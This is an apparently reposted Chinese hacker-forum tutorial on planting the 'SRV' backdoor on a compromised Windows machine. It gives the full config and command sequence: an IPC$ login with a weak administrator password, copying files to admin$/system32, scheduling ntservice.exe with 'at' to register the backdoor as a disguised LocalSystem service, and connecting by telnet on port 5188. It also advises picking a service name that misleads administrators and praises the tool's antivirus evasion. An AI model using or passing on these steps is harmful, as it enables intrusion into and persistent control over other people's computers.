[转载]独孤剑客新后门SRV试用手记
信息来源:水晶黑客联盟前几天在独孤剑客的网站上溜达,无意中发现了这个神人出的新后门工具,叫SRV,呵呵!名
字和后门好象没多少联系啊,后门的简介颇为诱人:
目前任何杀毒软件都查杀不到的.
程序在肉鸡上运行后开5188端口,然后telnet ip 5188……。
反正也没有事情做,干脆就试试这个新后门吧!
经过试用发现真是十分的爽,在此不敢独享,拿出来与大家一起分享。
(注意:使用这个后门需要用到一个工具:netservice,将srv.exe注册为系统服务,这样就
使SRV彻底的成为一个隐蔽的后门。)
也许某位大哥会在这里说:HI,这位写手,你没毛病吧,让你介绍SRV,关那个netservice什
么鸟事啊?
呵呵!别生气啊,先听听在讲解之前SRV之前讲解netservice的思路和目的。
现在绝大多数后门程序都不是以服务来启动的,而只是在注册表中的run键值中作为自启动的
,这样的后门有很很大的弊端:
1.如果对方主机没有重新启动的话,那么在run键值中后门就不会被执行.
2.当对方主机注销后,已经被执行的run中的后门会终止掉。
3.种植的后门以管理员权限被执行的话,如果对方主机的管理员以一个guest或user权限的帐
户登陆主机的话,被执行的后门得到的权限也只是Guest或user权限,但如果是以服务方式执行
的话,程序得到的权限是LocalSystem,所以将后门注册为服务是最好的隐藏方式。
明白我的意思了吧,也就是说虽然srv是个不会被杀毒软件查杀的后门,但是受到上述的种种
条件的制约,所以将其注册为服务来隐藏在目标主机中是最好的后门放置方法了,这个工作就
由netservic来做了。
OK,明白我的意思了吧,下面我就来个实地演示了。
准备工具:ntservice.exe,srv.exe,以及一个空口令ipc$肉鸡。
步骤一:
先将ntservice.exe进行配置以适应后门srv的需要。
将ntservice.exe和ntservice.ini复制到同一个文件目录下,
ntservice.ini的格式如下:
[Settings]
ServiceName = Application
LogEnable = 0
ProcCount = 2
[Process0]
CommandLine = srv.exe
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
[Process1]
CommandLine = heidan.exe
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
这个就是ntservice.exe的配置文件,我来修改一下吧。
第二行中的ServiceName = Application
将 Application改为任意服务名字(改这个有很大的艺术啊,试想你将它修改为一个与系统
服务很象的名称,就会迷惑对方管理员使它不敢轻易删除它。)
第三行LogEnable = 0
这里0意思是程序不自动生成一个日志,如果1就是会生成一个叫ntservice.log的文件,里
面会记录了服务启动以及启动配置文件中的程序的情况.
第四行ProcCount = 2
2代表将会设置两个程序让Service Loader在启动时去执行,如果你想设置三个程序让Servi
ce loader去执行,可以改为3
第五行[Process0]代表了第一个要被执行的程序的设置。
第六行CommandLine = srv.exe
这代表了将会让Service Loader去执行srv.exe.
第七行和第八行保持默认。
第九行UserInterface = No
NO代表了程序执行时会在后台被执行。
从第10行开始[Process1],这代表了第二个要被执行的程序的设置开始
第11行CommandLine = heidan.exe
这代表了将会让Service Loader去执行一个叫heidan.exe的程序
第12和13行仍然跟上面的一样保持默认。
后面的就不用我解释了吧,跟前面的一个意思。
如果需要第三个程序或更多程序要被执行时,就继续加入配置命令行如下
[Process2]
CommandLine = happy.exe
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
[Process3]
CommandLine = happy1.exe
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
[ProcessN]
CommandLine = happyn.exe
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
(注意:上面的[ProcessN]中的N不能超过20,也就说这个程序最多把21个后门注册为服务)
我们这里就[Process0]那一项就可以了,因为我们仅仅是想把SRV注册为服务。
ntservice.exe的安装如下:
将ntservice.exe和ntservice.ini复制到肉鸡的同一个目录中去后,在命令行中执行
ntservice.exe -insall
这样ntservice这个服务就被安装进去系统了,然后执行
net start ntservice
这样服务就被启动了(注意这个ntservice即是配置文件的ServiceName = 后面的项目,如果
你将ntservice修改为heidan,那么就用命令:net start heidan)
服务被启动后,就会读入配置文件(ntservice.ini),去启动里面的要执行的程序了。
OK!以下是我配置好的ini文件内容(如图1):
[Settings]
ServiceName = NTService
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine = srv.exe
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
步骤二:
把ntservice.exe ntservice.ini srv.exe三个程序传到肉鸡上吧。
打开CMD命令行,先建IPC$连接吧:
net use //61.186.*.*/ipc$ "hacker" /user:"administrator"
命令成功完全(如图2)
copy ntservice.exe //61.186.*.*/admin$/system32/
copy ntservice.ini //61.186.*.*/admin$/system32/
copy srv.exe //61.186.*.*/admin$/system32/(如图3)
at time //61.186.*.*(如图4)
得到对方系统的时间
at //61.186.*.* 10:51 ntservice -install(如图5)
安装完成后还必需要启动服务!
at //61.186.*.* 10:53 net start NTService
OK.输入at //61.186.*.*命令查看是否有NTService这个服务(如图6),哈哈!好了!完全
启动了。
步骤三:
后门隐藏好了,下面进入吧,用命令:
telnet 61.186.*.* 5188 回车后即可进入(如图7)。
过瘾吧,不会查杀的后门再加上已经注册为服务的特性简直就是如虎添翼,以后你的肉鸡就
不会常丢失了,还等什么,快去DIY一把吧!
页:
[1]